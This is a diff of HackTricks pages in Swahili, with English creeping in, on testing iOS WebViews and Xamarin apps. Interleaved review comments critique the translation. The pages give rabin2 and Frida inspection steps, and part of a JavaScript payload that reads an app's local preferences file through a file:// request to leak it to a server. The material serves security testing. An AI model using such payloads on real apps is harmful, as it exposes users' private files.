- **SFSafariViewController** inatoa uzoefu wa kawaida wa kuvinjari wavuti ndani ya programu, inayotambulika kwa muundo wake maalum ikiwa ni pamoja na uga wa anwani usio na uwezo wa kuandika, vifungo vya kushiriki na urambazaji, na kiunga moja kwa moja cha kufungua maudhui kwenye Safari. Tofauti na **WKWebView**, **JavaScript** haiwezi kuzimwa katika **SFSafariViewController**, ambayo pia inashiriki vidakuzi na data na Safari, ikilinda faragha ya mtumiaji kutoka kwenye programu. Lazima ionyeshwe kwa njia inayojulikana kulingana na mwongozo wa Duka la App.
- **SFSafariViewController** inatoa uzoefu wa kawaida wa kuvinjari wavuti ndani ya programu, inayotambulika kwa mpangilio wake maalum ikiwa ni pamoja na uwanja wa anwani wa kusoma tu, vitufe vya kushiriki na urambazaji, na kiungo cha moja kwa moja kufungua maudhui katika Safari. Tofauti na **WKWebView**, **JavaScript** haiwezi kuzimwa katika **SFSafariViewController**, ambayo pia inashiriki vidakuzi na data na Safari, ikihifadhi faragha ya mtumiaji kutoka kwa programu. Inapaswa kuonyeshwa kwa wazi kulingana na miongozo ya Duka la Programu.
```javascript
// Example of disabling JavaScript in WKWebView:
WKPreferences *preferences = [[WKPreferences alloc] init];
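Review bot: The fenced block opening with "// Example of disabling JavaScript in WKWebView:" is tagged ```javascript but the body is Objective-C (`WKPreferences *preferences = [[WKPreferences alloc] init];`), so syntax highlighting is wrong; tag it ```objectivec. Also, "The code of this page was extracted from here ... Check the page for further details." replaces a Swahili sentence with English inside an otherwise Swahili page, as do "## WebViews types" and the title; if that is intended, state the convention, otherwise keep the translated sentence.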
@ -34,45 +35,45 @@ WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
config.preferences = preferences;
WKWebView *webView = [[WKWebView alloc] initWithFrame:CGRectZero configuration:config];
```
## Muhtasari wa Uchunguzi wa Usanidi wa WebViews
## WebViews Configuration Exploration Summary
### **Maelezo ya Uchambuzi Statiki**
### **Static Analysis Overview**
Katika mchakato wa kuchunguza usanidi wa **WebViews**, kuna aina mbili kuu zinazozingatiwa: **UIWebView** na **WKWebView**. Kwa kubainisha WebViews hizi ndani ya faili ya binary, amri hutumiwa kutafuta marejeleo ya darasa maalum na njia za kuanzisha.
Katika mchakato wa kuchunguza mipangilio ya **WebViews**, aina mbili kuu zinazingatiwa: **UIWebView** na **WKWebView**. Ili kubaini WebViews hizi ndani ya binary, amri zinatumika, zikitafuta marejeleo maalum ya darasa na mbinu za kuanzisha.
- **Uthibitisho wa UIWebView**
- **UIWebView Identification**
```bash
$ rabin2 -zz ./WheresMyBrowser | egrep "UIWebView$"
```
Amri hii inasaidia kupata sehemu za **UIWebView** kwa kutafuta herufi zinazohusiana nayo katika faili ya binary.
Hii amri inasaidia katika kutafuta matukio ya **UIWebView** kwa kutafuta nyuzi za maandiko zinazohusiana nayo katika binary.
- **Uthibitisho wa WKWebView**
- **Utambuzi wa WKWebView**
```bash
$ rabin2 -zz ./WheresMyBrowser | egrep "WKWebView$"
```
Vivyo hivyo, kwa **WKWebView**, amri hii inatafuta faili ya binary kwa maneno yanayodhihirisha matumizi yake.
Vivyo hivyo, kwa **WKWebView**, amri hii inatafuta kwenye binary kwa maandiko yanayoashiria matumizi yake.
Zaidi ya hayo, ili kupata jinsi **WKWebView** inavyoanzishwa, amri ifuatayo inatekelezwa, ikilenga saini ya njia inayohusiana na uanzishaji wake:
```bash
$ rabin2 -zzq ./WheresMyBrowser | egrep "WKWebView.*frame"
```
#### **Uhakiki wa Usanidi wa JavaScript**
#### **JavaScript Configuration Verification**
Kwa **WKWebView**, inasisitizwa kuwa kuzima JavaScript ni njia bora isipokuwa ikihitajika. Faili iliyoundwa inatafutwa ili kuhakikisha kuwa mali ya `javaScriptEnabled` imewekwa kama `false`, ikidhibitisha kuwa JavaScript imezimwa:
Kwa **WKWebView**, inasisitizwa kwamba kuzima JavaScript ni njia bora isipokuwa inahitajika. Binafsi iliyokusanywa inatafutwa ili kuthibitisha kwamba mali ya `javaScriptEnabled` imewekwa kuwa `false`, kuhakikisha kwamba JavaScript imezimwa:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "javascriptenabled"
```
#### **Uthibitisho wa Yaliyomo Salama Pekee**
#### **Tu Thibitisho la Maudhui Salama Pekee**
**WKWebView** inatoa uwezo wa kutambua matatizo ya yaliyomo mchanganyiko, tofauti na **UIWebView**. Hii inathibitishwa kwa kutumia mali ya `hasOnlySecureContent` ili kuhakikisha kuwa rasilimali zote za ukurasa zimepakiwa kupitia uhusiano salama. Utafutaji katika faili iliyohaririwa hufanyika kama ifuatavyo:
**WKWebView** inatoa uwezo wa kubaini masuala ya maudhui mchanganyiko, tofauti na **UIWebView**. Hii inakaguliwa kwa kutumia mali ya `hasOnlySecureContent` ili kuhakikisha rasilimali zote za ukurasa zinapakiwa kupitia muunganisho salama. Utafutaji katika binary iliyokusanywa unafanywa kama ifuatavyo:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent"
```
### **Machapisho ya Uchambuzi wa Kudumu**
### **Uchambuzi wa Kineti**
Uchambuzi wa kudumu unahusisha ukaguzi wa kundi la kumbukumbu ya WebView na mali zake. Skripti iliyoitwa `webviews_inspector.js` hutumiwa kwa kusudi hili, ikilenga kundi la kumbukumbu za `UIWebView`, `WKWebView`, na `SFSafariViewController`. Inaandika habari kuhusu kundi la kumbukumbu zilizopatikana, ikiwa ni pamoja na URL na mipangilio inayohusiana na JavaScript na maudhui salama.
Uchambuzi wa kineti unahusisha kukagua heap kwa ajili ya mifano ya WebView na mali zao. Skripti inayoitwa `webviews_inspector.js` inatumika kwa kusudi hili, ikilenga mifano ya `UIWebView`, `WKWebView`, na `SFSafariViewController`. Inarekodi taarifa kuhusu mifano iliyopatikana, ikiwa ni pamoja na URLs na mipangilio inayohusiana na JavaScript na maudhui salama.
Ukaguzi wa kundi la kumbukumbu unaweza kufanywa kwa kutumia `ObjC.choose()` ili kutambua kundi la kumbukumbu za WebView na kuangalia mali za `javaScriptEnabled` na `hasonlysecurecontent`.
Ukaguzi wa heap unaweza kufanywa kwa kutumia `ObjC.choose()` ili kubaini mifano ya WebView na kuangalia mali za `javaScriptEnabled` na `hasonlysecurecontent`.
{% code title="webviews_inspector.js" %}
```javascript
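Review bot: "Binafsi iliyokusanywa inatafutwa ili kuthibitisha kwamba mali ya `javaScriptEnabled` imewekwa kuwa `false`" turns "the compiled binary" into "Binafsi" (personal/private), which changes the meaning; the later sentence in the same hunk already uses the correct "binary iliyokusanywa". In the dynamic-analysis paragraph, the property is written `hasonlysecurecontent` in prose while the script and the earlier heading use `hasOnlySecureContent`; the grep is case-insensitive but the prose should name the real property. "Uchambuzi wa Kineti" (kinetic) is also a different word from the "dinamik" used for dynamic analysis further down; use one.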
@ -121,30 +122,30 @@ console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString());
```
{% endcode %}
Script inatekelezwa kwa kutumia:
Script inatekelezwa na:
```bash
frida -U com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js
```
**Matokeo Muhimu**:
- Sehemu za WebViews zinapatikana na kuchunguzwa kwa mafanikio.
- Uwezeshaji wa JavaScript na mipangilio salama ya maudhui inathibitishwa.
- Mifano ya WebViews imefanikiwa kupatikana na kukaguliwa.
- Uthibitishaji wa kuwezesha JavaScript na mipangilio ya maudhui salama umefanywa.
Muhtasari huu unawakilisha hatua muhimu na amri zinazohusika katika uchambuzi wa mipangilio ya WebView kupitia njia za tuli na za kudumu, kuzingatia vipengele vya usalama kama uwezeshaji wa JavaScript na ugunduzi wa maudhui yaliyochanganyika.
Muhtasari huu unajumuisha hatua muhimu na amri zinazohusika katika kuchambua usanidi wa WebView kupitia mbinu za statiki na za dinamik, zikilenga kwenye vipengele vya usalama kama kuwezesha JavaScript na kugundua maudhui mchanganyiko.
## Kusindika Itifaki za WebView
## Usimamizi wa Itifaki ya WebView
Kusindika maudhui katika WebViews ni jambo muhimu, haswa linapokuja suala la itifaki mbalimbali kama vile `http(s)://`, `file://`, na `tel://`. Itifaki hizi huruhusu kupakia maudhui ya mbali na ya ndani ndani ya programu. Inasisitizwa kwamba wakati wa kupakia maudhui ya ndani, tahadhari lazima ichukuliwe ili kuzuia watumiaji kubadilisha jina au njia ya faili na kuhariri maudhui yenyewe.
Kushughulikia maudhui katika WebViews ni kipengele muhimu, hasa linapokuja suala la itifaki mbalimbali kama `http(s)://`, `file://`, na `tel://`. Itifaki hizi zinawezesha upakiaji wa maudhui ya mbali na ya ndani ndani ya programu. Inasisitizwa kwamba wakati wa kupakia maudhui ya ndani, tahadhari lazima ichukuliwe ili kuzuia watumiaji kuathiri jina la faili au njia na kutoka kuhariri maudhui yenyewe.
**WebViews** hutoa njia tofauti za kupakia maudhui. Kwa **UIWebView**, ambayo sasa imepitwa na wakati, njia kama `loadHTMLString:baseURL:` na `loadData:MIMEType:textEncodingName:baseURL:` hutumiwa. **WKWebView**, kwa upande mwingine, hutumia `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, na `loadRequest:` kwa maudhui ya wavuti. Njia kama `pathForResource:ofType:`, `URLForResource:withExtension:`, na `init(contentsOf:encoding:)` kawaida hutumiwa kupakia faili za ndani. Njia `loadFileURL:allowingReadAccessToURL:` ni muhimu hasa kwa uwezo wake wa kupakia URL au saraka maalum ndani ya WebView, ikifichua data nyeti ikiwa saraka imeelekezwa.
**WebViews** hutoa mbinu tofauti za upakiaji wa maudhui. Kwa **UIWebView**, ambayo sasa imeondolewa, mbinu kama `loadHTMLString:baseURL:` na `loadData:MIMEType:textEncodingName:baseURL:` zinatumika. **WKWebView**, kwa upande mwingine, inatumia `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, na `loadRequest:` kwa maudhui ya wavuti. Mbinu kama `pathForResource:ofType:`, `URLForResource:withExtension:`, na `init(contentsOf:encoding:)` kwa kawaida hutumiwa kwa upakiaji wa faili za ndani. Mbinu `loadFileURL:allowingReadAccessToURL:` inajulikana hasa kwa uwezo wake wa kupakia URL au saraka maalum ndani ya WebView, ambayo inaweza kufichua data nyeti ikiwa saraka imeainishwa.
Ili kupata njia hizi katika nambari ya chanzo au faili iliyokompiliwa, amri kama zifuatazo zinaweza kutumika:
Ili kupata mbinu hizi katika msimbo wa chanzo au binary iliyokusanywa, amri kama ifuatayo zinaweza kutumika:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:
```
Kuhusu **upatikanaji wa faili**, UIWebView inaruhusu kwa ujumla, wakati WKWebView inaleta mipangilio ya `allowFileAccessFromFileURLs` na `allowUniversalAccessFromFileURLs` kwa kusimamia upatikanaji kutoka kwa URL za faili, ambapo zote mbili ni za uwongo kwa chaguo-msingi.
Kuhusu **file access**, UIWebView inaruhusu kwa ujumla, wakati WKWebView inaanzisha mipangilio ya `allowFileAccessFromFileURLs` na `allowUniversalAccessFromFileURLs` kwa ajili ya kudhibiti ufikiaji kutoka kwa URL za faili, ambapo zote ni za uongo kwa chaguo-msingi.
Mfano wa skrini ya Frida umetolewa kuangalia mipangilio ya usalama ya **WKWebView**:
Mfano wa skripti ya Frida unatolewa ili kukagua mipangilio ya **WKWebView** kwa ajili ya mipangilio ya usalama:
```bash
ObjC.choose(ObjC.classes['WKWebView'], {
onMatch: function (wk) {
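Review bot: the rewritten paragraph beginning "**WebViews** hutoa mbinu tofauti" now says UIWebView "imeondolewa" (has been removed); UIWebView is deprecated, not removed, and the earlier wording "imepitwa na wakati" was the accurate one, so keep it. In the same hunk, "Kuhusu **file access**" leaves the term in English where the previous line had "upatikanaji wa faili", and "Script inatekelezwa na:" reads as "the script is executed by", whereas the earlier "kwa kutumia" (using) matches the `frida -U ...` command that follows.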
@ -162,7 +163,7 @@ console.log('done for WKWebView!');
}
});
```
Mwisho, mfano wa mzigo wa JavaScript unaolenga kuvuja faili za ndani unaonyesha hatari ya usalama inayohusiana na WebViews zisizowekwa vizuri. Mzigo huu unakodisha maudhui ya faili kwa muundo wa hex kabla ya kuyatuma kwa seva, ukionyesha umuhimu wa hatua kali za usalama katika utekelezaji wa WebView.
Lastly, mfano wa JavaScript payload unaolenga kuhamasisha faili za ndani unaonyesha hatari ya usalama inayoweza kutokea kutokana na WebViews zisizofanywa vizuri. Huu payload unachakata maudhui ya faili katika muundo wa hex kabla ya kuyatumia kwa seva, ukisisitiza umuhimu wa hatua kali za usalama katika utekelezaji wa WebView.
```javascript
String.prototype.hexEncode = function(){
var hex, i;
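Review bot: the rewritten closing paragraph starts with the untranslated word "Lastly," and renders the file-leaking payload as "kuhamasisha faili za ndani" (to motivate local files); the previous "kuvuja faili za ndani" (leak local files) carried the intended meaning and should be kept. "WebViews zisizofanywa vizuri" (WebViews not done well) also loses the sense of misconfiguration that "zisizowekwa vizuri" had.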
@ -185,24 +186,24 @@ xhr2.send(null);
xhr.open('GET', 'file:///var/mobile/Containers/Data/Application/ED4E0AD8-F7F7-4078-93CC-C350465048A5/Library/Preferences/com.authenticationfailure.WheresMyBrowser.plist', true);
xhr.send(null);
```
## Njia za Asili Zilizofunuliwa Kupitia WebViews
## Mbinu za Asili Zinazofichuliwa Kupitia WebViews
## Kuelewa Miunganisho ya Asili ya WebView katika iOS
## Kuelewa Interfaces za Asili za WebView katika iOS
Kuanzia iOS 7 na kuendelea, Apple ilitoa APIs kwa **mawasiliano kati ya JavaScript katika WebView na vitu vya asili** vya Swift au Objective-C. Ushirikiano huu unawezeshwa hasa kupitia njia mbili:
Kuanzia iOS 7 na kuendelea, Apple ilitoa APIs kwa **mawasiliano kati ya JavaScript katika WebView na asili** Swift au Objective-C vitu. Uunganisho huu unafanywa hasa kupitia mbinu mbili:
- **JSContext**: Kazi ya JavaScript inaundwa moja kwa moja wakati kipande cha Swift au Objective-C kinahusishwa na kitambulisho ndani ya `JSContext`. Hii inaruhusu ushirikiano na mawasiliano laini kati ya JavaScript na nambari ya asili.
- **Itifaki ya JSExport**: Kwa kurithi itifaki ya `JSExport`, mali za asili, njia za kesi, na njia za darasa zinaweza kufunuliwa kwa JavaScript. Hii inamaanisha mabadiliko yoyote yaliyofanywa katika mazingira ya JavaScript yanajitokeza katika mazingira ya asili, na kinyume chake. Hata hivyo, ni muhimu kuhakikisha kuwa data nyeti haifichuliwi kwa bahati mbaya kupitia njia hii.
- **JSContext**: Kazi ya JavaScript inaundwa kiotomatiki wakati block ya Swift au Objective-C inapounganishwa na kitambulisho ndani ya `JSContext`. Hii inaruhusu uunganisho na mawasiliano yasiyo na mshono kati ya JavaScript na msimbo wa asili.
- **JSExport Protocol**: Kwa kurithi protokali ya `JSExport`, mali za asili, mbinu za mfano, na mbinu za darasa zinaweza kufichuliwa kwa JavaScript. Hii inamaanisha kwamba mabadiliko yoyote yaliyofanywa katika mazingira ya JavaScript yanaakisiwa katika mazingira ya asili, na kinyume chake. Hata hivyo, ni muhimu kuhakikisha kuwa data nyeti haifichuliwi bila kukusudia kupitia mbinu hii.
### Kupata `JSContext` katika Objective-C
### Kufikia `JSContext` katika Objective-C
Katika Objective-C, `JSContext` kwa `UIWebView` inaweza kupatikana kwa kutumia msimbo ufuatao:
Katika Objective-C, `JSContext` kwa `UIWebView` inaweza kupatikana kwa mstari ufuatao wa msimbo:
```objc
[webView valueForKeyPath:@"documentView.webView.mainFrame.javaScriptContext"]
```
### Mawasiliano na `WKWebView`
### Communication with `WKWebView`
Kwa `WKWebView`, ufikiaji moja kwa moja wa `JSContext` haupo. Badala yake, ujumbe unatumwa kupitia kazi ya `postMessage`, kuruhusu mawasiliano kati ya JavaScript na programu ya asili. Wachanganuzi kwa ajili ya ujumbe huu huanzishwa kama ifuatavyo, kuruhusu JavaScript kuingiliana na programu ya asili kwa usalama:
Kwa `WKWebView`, ufikiaji wa moja kwa moja kwa `JSContext` haupatikani. Badala yake, upitishaji ujumbe unatumika kupitia kazi ya `postMessage`, ikiruhusu mawasiliano kati ya JavaScript na asili. Watoa huduma kwa ujumbe hawa wamewekwa kama ifuatavyo, ikiruhusu JavaScript kuingiliana na programu ya asili kwa usalama:
```swift
func enableJavaScriptBridge(_ enabled: Bool) {
options_dict["javaScriptBridge"]?.value = enabled
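Review bot: the heading "### Communication with `WKWebView`" is left in English although the previous version "### Mawasiliano na `WKWebView`" was already translated, and "## Kuelewa Interfaces za Asili za WebView katika iOS" mixes both languages. The rewritten sentence "mawasiliano kati ya JavaScript katika WebView na asili Swift au Objective-C vitu" keeps English word order and is ungrammatical in Swahili; the earlier "na vitu vya asili vya Swift au Objective-C" reads correctly. "Watoa huduma" (service providers) for the `postMessage` handlers is also misleading; keep "handlers" as a technical term if no Swahili equivalent fits.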
@ -215,9 +216,9 @@ userContentController.add(javaScriptBridgeMessageHandler, name: "javaScriptBridg
}
}
```
### Mwingiliano na Majaribio
### Interaction and Testing
JavaScript inaweza kuingiliana na safu ya asili kwa kufafanua kifaa cha ujumbe cha skripti. Hii inaruhusu shughuli kama kuita kazi za asili kutoka kwenye ukurasa wa wavuti:
JavaScript inaweza kuingiliana na safu asilia kwa kufafanua mpangilio wa ujumbe wa skripti. Hii inaruhusu operesheni kama vile kuita kazi za asili kutoka kwa ukurasa wa wavuti:
```javascript
function invokeNativeOperation() {
value1 = document.getElementById("value1").value
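Review bot: "### Interaction and Testing" reverts an already-translated heading ("### Mwingiliano na Majaribio") to English in an otherwise Swahili page; keep the Swahili heading. The `invokeNativeOperation` snippet in this hunk is unchanged context.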
@ -228,7 +229,7 @@ window.webkit.messageHandlers.javaScriptBridge.postMessage(["multiplyNumbers", v
// Alternative method for calling exposed JavaScript functions
document.location = "javascriptbridge://addNumbers/" + 1 + "/" + 2
```
Kwa kuchukua na kubadilisha matokeo ya wito wa kazi ya asili, mtu anaweza kubadilisha kazi ya kurejesha ndani ya HTML:
Ili kukamata na kubadilisha matokeo ya wito wa kazi asilia, mtu anaweza kubadilisha kazi ya kurudi ndani ya HTML:
```html
<html>
<script>
@ -239,7 +240,7 @@ alert(result);
</script>
</html>
```
Upande wa asili unashughulikia wito wa JavaScript kama inavyoonyeshwa katika darasa la `JavaScriptBridgeMessageHandler`, ambapo matokeo ya operesheni kama vile kuzidisha nambari yanapangwa na kutumwa tena kwa JavaScript ili kuonyeshwa au kufanyiwa mabadiliko zaidi:
Sehemu ya asili inashughulikia wito wa JavaScript kama inavyoonyeshwa katika darasa la `JavaScriptBridgeMessageHandler`, ambapo matokeo ya operesheni kama vile kuzidisha nambari yanashughulikiwa na kutumwa nyuma kwa JavaScript kwa ajili ya kuonyeshwa au usindikaji zaidi:
```swift
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {
// Handling "multiplyNumbers" operation
@ -252,40 +253,41 @@ let javaScriptCallBack = "javascriptBridgeCallBack('\(functionFromJS)','\(result
message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)
}
```
## Kurekebisha Mipangilio ya iOS WebViews
## Debugging iOS WebViews
(Mafunzo yaliyojikita kwenye [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews))
(Tutorial based on the one from [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews))
Ili kurekebisha maudhui ya wavuti kwa ufanisi ndani ya iOS webviews, mazingira maalum yanahitajika ambayo yanahusisha zana za maendeleo za Safari kutokana na ukweli kwamba ujumbe uliotumwa kwa `console.log()` haionyeshwi kwenye magogo ya Xcode. Hapa kuna mwongozo rahisi, ukiangazia hatua muhimu na mahitaji:
Ili kufanikisha ufuatiliaji wa maudhui ya wavuti ndani ya iOS webviews, inahitajika mipangilio maalum inayohusisha zana za maendeleo za Safari kwa sababu ujumbe unaotumwa kwa `console.log()` hauonyeshwi katika kumbukumbu za Xcode. Hapa kuna mwongozo rahisi, ukisisitiza hatua na mahitaji muhimu:
- **Maandalizi kwenye Kifaa cha iOS**: Safari Web Inspector inahitaji kuwezeshwa kwenye kifaa chako cha iOS. Hii inafanywa kwa kwenda kwenye **Mipangilio > Safari > Advanced**, na kuwezesha _Web Inspector_.
- **Maandalizi kwenye Kifaa cha iOS**: Mchunguzi wa Wavuti wa Safari unahitaji kuwezeshwa kwenye kifaa chako cha iOS. Hii inafanywa kwa kwenda **Settings > Safari > Advanced**, na kuwezesha _Web Inspector_.
- **Maandalizi kwenye Kifaa cha macOS**: Kwenye kompyuta yako ya maendeleo ya macOS, lazima uwezeshe zana za maendeleo ndani ya Safari. Anza Safari, nenda **Safari > Mapendeleo > Advanced**, na chagua chaguo la _Onyesha menyu ya Maendeleo_.
- **Maandalizi kwenye Kifaa cha macOS**: Kwenye mashine yako ya maendeleo ya macOS, lazima uwezeshe zana za maendeleo ndani ya Safari. Fungua Safari, upate **Safari > Preferences > Advanced**, na chagua chaguo la _Show Develop menu_.
- **Unganisho na Kurekebisha**: Baada ya kuunganisha kifaa chako cha iOS kwenye kompyuta yako ya macOS na kuzindua programu yako, tumia Safari kwenye kifaa chako cha macOS kuchagua webview unayotaka kurekebisha. Nenda kwenye _Develop_ kwenye menyu ya Safari, weka kipanya juu ya jina la kifaa chako cha iOS ili kuona orodha ya mifano ya webview, na chagua mfano unayotaka kukagua. Dirisha jipya la Safari Web Inspector litafunguka kwa kusudi hili.
- **Muunganisho na Ufuatiliaji**: Baada ya kuunganisha kifaa chako cha iOS na kompyuta yako ya macOS na kuzindua programu yako, tumia Safari kwenye kifaa chako cha macOS kuchagua webview unayotaka kufuatilia. Tembea hadi _Develop_ kwenye menyu ya Safari, piga juu ya jina la kifaa chako cha iOS ili kuona orodha ya matukio ya webview, na chagua tukio unalotaka kukagua. Dirisha jipya la Mchunguzi wa Wavuti wa Safari litafunguliwa kwa ajili ya hili.
Hata hivyo, kuwa mwangalifu kuhusu vikwazo:
Hata hivyo, kuwa makini na mipaka:
- Kurekebisha kwa njia hii kunahitaji kifaa cha macOS kwani inategemea Safari.
- Webviews tu katika programu zilizopakiwa kwenye kifaa chako kupitia Xcode zinastahili kurekebishwa. Webviews katika programu zilizosakinishwa kupitia Duka la App au Apple Configurator haziwezi kurekebishwa kwa njia hii.
- Ufuatiliaji kwa njia hii unahitaji kifaa cha macOS kwani inategemea Safari.
- Ni webviews pekee katika programu zilizopakiwa kwenye kifaa chako kupitia Xcode zinazostahili kufuatiliwa. Webviews katika programu zilizowekwa kupitia Duka la Programu au Mkononi wa Apple cannot be debugged in this manner.
## Marejeo
## References
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6)
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
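Review bot: the rewritten sentence about App Store and Apple Configurator apps switches language mid-sentence ("... Mkononi wa Apple cannot be debugged in this manner") and translates the product name Apple Configurator as "Mkononi wa Apple"; the previous version kept the proper noun and finished the sentence in Swahili ("haziwezi kurekebishwa kwa njia hii"), so restore that. In the same hunk the heading "## Debugging iOS WebViews", the line "(Tutorial based on the one from ...)" and "## References" are left in English while their previous versions were translated, and the new "Learn & practice AWS Hacking" banner and support footer bullets ("Check the subscription plans", "Join the Discord group", "Share hacking tricks ...") are English in a Swahili page; the NDMP file in this same commit translates that banner, so pick one treatment for all files.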

@ -1,82 +1,84 @@
# Programu za Xamarin
# Xamarin Apps
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Hii ni muhtasari wa chapisho la blogu [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
Hii ni muhtasari wa chapisho la blog [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
## **Taarifa Msingi**
## **Basic Information**
Xamarin ni **jukwaa huria** lililoundwa kwa watengenezaji kuunda programu za iOS, Android, na Windows kwa kutumia fremu za .NET na C#. Jukwaa hili linafikia zana nyingi na nyongeza za kuunda programu za kisasa kwa ufanisi.
Xamarin ni **jukwaa la chanzo wazi** lililoundwa kwa ajili ya waendelezaji **kuunda programu za iOS, Android, na Windows** kwa kutumia .NET na C# frameworks. Jukwaa hili linatoa ufikiaji wa zana nyingi na nyongeza za kuunda programu za kisasa kwa ufanisi.
### Usanifu wa Xamarin
### Xamarin's Architecture
- Kwa **Android**, Xamarin inaunganisha na majina ya Android na Java kupitia vifurushi vya .NET, ikifanya kazi ndani ya mazingira ya utekelezaji ya Mono pamoja na Android Runtime (ART). Vifurushi vya Kuita vilivyosimamiwa (MCW) na Vifurushi vya Kuita vya Android (ACW) hufanikisha mawasiliano kati ya Mono na ART, ambayo yote yamejengwa kwenye kernel ya Linux.
